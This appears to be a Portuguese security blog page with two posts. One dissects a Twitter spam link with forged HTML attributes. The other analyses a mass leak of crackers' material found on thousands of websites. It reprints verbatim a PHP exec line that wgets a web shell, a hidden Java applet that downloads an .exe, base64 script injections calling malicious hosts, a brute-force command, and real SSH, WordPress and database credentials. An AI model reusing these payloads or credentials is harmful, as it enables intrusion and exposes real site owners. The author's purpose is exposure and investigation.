quinta-feira, 27 de outubro de 2011

Anatomia de um link malicioso no Twitter

3 comentários
Essa é para os twitteiros, já viu quando você envia um tweet e recebe como repply ou mention um link estranho de umas pessoas mais estranhas ainda? Pois bem, isso é um tipo de spam no Twitter que assim como nos e-mails pode levar para links maliciosos e devemos ter cuidado.

Vejamos um que recebi:



No número 1 vemos um link encurtado que supostamente parece estar oferecendo um brinde gratuito da Starbucks. Quando posicionamos o mouse em cima dele aparece o item 2 que passa a impressão que o link vai nos levar para o site http://www.starbucks.com e ao mesmo tempo no rodapé do navegador aparece o número 3 que é o encurtador de URLs do Twitter que entra em ação toda vez que postamos um link nos tweets.

Com tudo isso parece que o link postado foi encurtado automaticamente pelo t.co do Twitter e que quando clicado nos redirecionará para www.starbucks.com que seria o link verdadeiro “desencurtado”. Isso é o que acontece normalmente quando posicionamos o mouse em cima de um link legítimo mas aqui não funciona assim, vejamos o HTML dele:


<a class=”twitter-timeline-link” rel=”nofollow” target=”_blank”
      title=”http://www.starbucks.com/”
      data-expanded-url=”http://Z7zl.free-starbucks-gift-card.noip.me/0aj01ihae?9lt83tm”
      href=”http://t.co/Yz6fD14g”
      data-ultimate-url=”http://www.starbucks.com/”>
           Z7zl.free-starbucks-gift-card.noip.me/0aj01ihae?9lt8...
</a>

Pelo código dá para ver que o spammer forjou as propriedades title e data-ultimate-url do link para aplicar sua engenharia social. Essas duas propriedades servem apenas para descrição do link, é um jeito que o Twitter criou para exibir para o usuário a URL original que foi encurtada antes mesmo de ser clicada.

A URL que realmente será aberta é a que está em href que é do encurtador que redirecionará para a que está em data-expanded-url.

Ao clicar no link, meu computador (Client host) foi redirecionado para todos esses servidores (Server host):


Até chegar ao destino final:


Um site pornográfico, mas também poderia ser um site com exploit kits, malwares, etc. Nada de presentes da Starbucks.

Caso queira saber mais sobre spam no Twitter e como reportar um spammer acesse a página oficial dedicada a isso: https://support.twitter.com/articles/64986-how-to-report-spam-on-twitter

Abraços!
Postado por Ronaldo Lima às 08:00
Marcadores: , , ,

quinta-feira, 6 de outubro de 2011

Crackers invadem mais de 14 mil sites e deixam seus dados expostos

19 comentários
Recentemente um leitor do blog me enviou um link muito suspeito para análise, ao acessá-lo abriu essa página:


Agora vá ao Google, digite por exemplo “python pyFTP.py -i Ftp.txt” com aspas e mande pesquisar (não abra os sites encontrados). 

Hoje, o Google retornou mais de 14 mil sites com essas mesmas informações. Aqui estão elas na íntegra:

<? exec("wget http://rafaeltongol.com/2.txt;mv 2.txt wp-word.php"); ?>

<applet name="Flash Player 11" code="afp.class" archive="http://66.49.154.203/usage/.jar/java.php?a=afp.jar" width="1" height="1"><param name="link" value="http://66.49.154.203/usage/.exe/download.php?a=FlashPlay.exe"></applet>

<? $auto_confi = base64_decode('PHNjcmlwdCBzcmM9Imh0dHA6Ly9hbGluZXJvaWZmZS5jb20vc2l0ZS9wbHVnaW4uanMiPjwvc2Ny
aXB0Pg==');
echo $auto_confi;?>


<script src="http://alineroiffe.com/site/plugin.js"></script>
<script src="http://atelier3.jp/js/java.js"></script>

allcompanyonline.com:allcompanyonline:admin123

python pyFTP.py -i Ftp.txt -e OK_Ftps.txt -t auto.txt -o Alterados.txt -l 8634

alineroiffe.com:alineroiffe:senha123
atelier3.jp:atelier3:atelier3

Linux ubuntu-server.entvoice.com 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
root@123.252.144.92   3k0(#09@8u@xm2

$P$B6yZv1TLwMlV9rZxXrjFW6oNO4AU5G/ = %%hacking%%


rafaeltongol.com:rafaeltongol:upload DEDICADO
ssh root@knihovna.tul.cz:Hacked1990
ssh apilecce@apilecce.it:apilecce


ssh akce@akce.cz:akce                          Scan Wordpress lol.log 1890018
ssh autimax@autimax.com.br:q1w2e3              Scan Token Joomla lol.log 2116824 OFF
ssh aurora@aurora.iiitm.ac.in:qwerty123        Scan Joomla Brute lol.log 6692945 OFF
ssh cba@cba.uah.edu:password                   Scan FTP Brs.txt 169700 OFF
ssh cupnoodles@cupnoodles.com.br:q1w2e3        Scan Ftp Completo lol.log 1905797 + 500
ssh baigiang@baigiang.bachkim.vn:baigiang      Scan Brs.txt Joomla TOKEN 520352

=====================================================================================================================
............::::::::: Porrinha ::::::::...........
=====================================================================================================================
Contador .HTTP: http://anfeso1201.dominiotemporario.com/contadorkeke/clientes/mostrar.php Total: 559
Data: 28/09/2011
=====================================================================================================================
Contador .HTTP: http://r7on.com.br/porraloka/clientes/mostrar.php Total: 1671
31/08/2011
=====================================================================================================================
Contador .HTTP: http://netransportes.com.br/amanda/clientes/mostrar.php Total: 2000
07/09/2011
=====================================================================================================================
TOTAL INFECTS: 00.000 x 0,50 = 000,00
=====================================================================================================================

=====================================================================================================================
.....:::: Psychlo ::::......
=====================================================================================================================
Total Combinado: 1000
Contador HTTP: http://64.186.158.114/tzu.php Total: 1000
Falta pagar:250,00
=====================================================================================================================
Total: 2214,00 Vo manda 3000,00 EM AVER 786,00 - 250 = 536

====================================================================================================================
............::::::::: Cavalo ::::::::...........
====================================================================================================================
Contador .EXE : 2053
====================================================================================================================
TOTAL INFECTS: 5.000 x 0,50 = 000,00
====================================================================================================================

Contador HTTP: http://200.98.201.13/~rex/tom/rel/inf4/?url=c Total: 3758
Falta pagar: 600,00

http://beta.statcounter.com/p7142950/entry_page/pageload/?url=http://www.cc.com/d.php 
flashgame_co_cc 
b470killer

miroslav.stampar@gmail.com Carinha do wordpress


8276 0241 Oi julimar


http://assistironlinefilme.com/wp-login.php:admin:123456 root User
http://www.assistironlinefilme.com/wp-word.php
define('DB_NAME', 'assisti2_wrdp1');

/** MySQL database username */
define('DB_USER', 'assisti2_wrdp1');

/** MySQL database password */
define('DB_PASSWORD', 'hIoGTSY8JGg6');

/** MySQL hostname */
define('DB_HOST', 'localhost');


http://assistirtvonline.com/wp-login.php:admin:123mudar Usuario admin email: gatao1593@hotmail.com root Email: nobody_linux@hush.ai
http://www.assistirtvonline.com/wp-content/themes/theme/wp-word.php
http://www.assistirtvonline.com/wp-content/cache/supercache/www.assistirtvonline.com/aovivo/pica-pau/worse.php
http://www.assistirtvonline.com/wp-content/cache/supercache/assistirtvonline.com./index_.php
http://www.assistirtvonline.com/aovivo.php
/** The name of the database for WordPress */
define('DB_NAME', 'assisti_01');

/** MySQL database username */
define('DB_USER', 'assisti_assisti');

/** MySQL database password */
define('DB_PASSWORD', '1903divina');

/** MySQL hostname */
define('DB_HOST', 'localhost');


/** The name of the database for WordPress */
define('DB_NAME', 'paraorku_db');

/** MySQL database username */
define('DB_USER', 'paraorku_Admin');

/** MySQL database password */
define('DB_PASSWORD', 'Clarity123-db');

/** MySQL hostname */
define('DB_HOST', 'localhost');


http://cultureba.com.br/wp-content/themes/theme/wp-word.php
http://cultureba.com.br/wp-words.php
define('DB_NAME', 'cultureb_cultureba');

/** MySQL database username */
define('DB_USER', 'cultureb_culture');

/** MySQL database password */
define('DB_PASSWORD', 'jana2810##');

/** MySQL hostname */
define('DB_HOST', 'localhost');



define('DB_NAME', 'chatfeminino');

/** MySQL database username */
define('DB_USER', 'chatfeminino');

/** MySQL database password */
define('DB_PASSWORD', 'moda102030');

/** MySQL hostname */
define('DB_HOST', 'mysql.chat-feminino.com');

A princípio o que me chama atenção é que tentaram inserir códigos da linguagem PHP em páginas que não eram PHP, sendo assim o servidor web não conseguiu interpretar os códigos e os trataram como se fossem texto simples.

Outros trechos que não contêm as tags do PHP <? e ?> também exibem informações dos crackers. Nesse caso imagino que foi falha da ferramenta ou o método que utilizaram, devem ter redirecionado a saída de algum comando para a página ao invés de outro arquivo de log por exemplo.

Ainda vemos informações contábeis dos golpes, isso me lembrou os caderninhos de contabilidade que são encontrados com os traficantes quando são apreendidos pela polícia, com informações de pagamentos, pedidos, apelidos e valores.

=================================================
.....:::: Psychlo ::::......
=================================================
Total Combinado: 1000
Contador HTTP: http://64.186.158.114/tzu.php Total: 1000
Falta pagar:250,00
=================================================
Total: 2214,00 Vo manda 3000,00 EM AVER 786,00 - 250 = 536

=================================================
............::::::::: Cavalo ::::::::...........
=================================================
Contador .EXE : 2053
=================================================
TOTAL INFECTS: 5.000 x 0,50 = 000,00
=================================================
Contador HTTP: http://200.98.201.13/~rex/tom/rel/inf4/?url=c Total: 3758
Falta pagar: 600,00
=================================================

Lembram das páginas que os malwares acessam quando conseguem infectar um computador? São os contadores para realizarem esse controle da “firma”, parece que cada computador infectado está valendo R$ 0,50.

Há até alguns dados para contato:

miroslav.stampar@gmail.com Carinha do wordpress
8276 0241 Oi julimar

Dessa vez decidi não esconder as informações porque elas estão disponíveis na internet para qualquer um ver e além disso eles não gostam de vazar dados sigilosos? Aí estão para apreciação.

Muita coisa pode ser extraída dessas informações, em breve novos posts com mais detalhes sobre o caso. Contribuições também são bem-vindas.

Leia a continuação desse caso: Crackers expostos, investigação de quadrilha banker

Os maus exercem geralmente maior influência no mundo pela fraqueza dos bons. Os maus são intrigantes e audaciosos; os bons são tímidos. Estes, quando quiserem, assumirão a preponderância.”
Postado por Ronaldo Lima às 16:57
Marcadores: , ,
Assinar: Postagens (Atom)
Related Posts Plugin for WordPress, Blogger...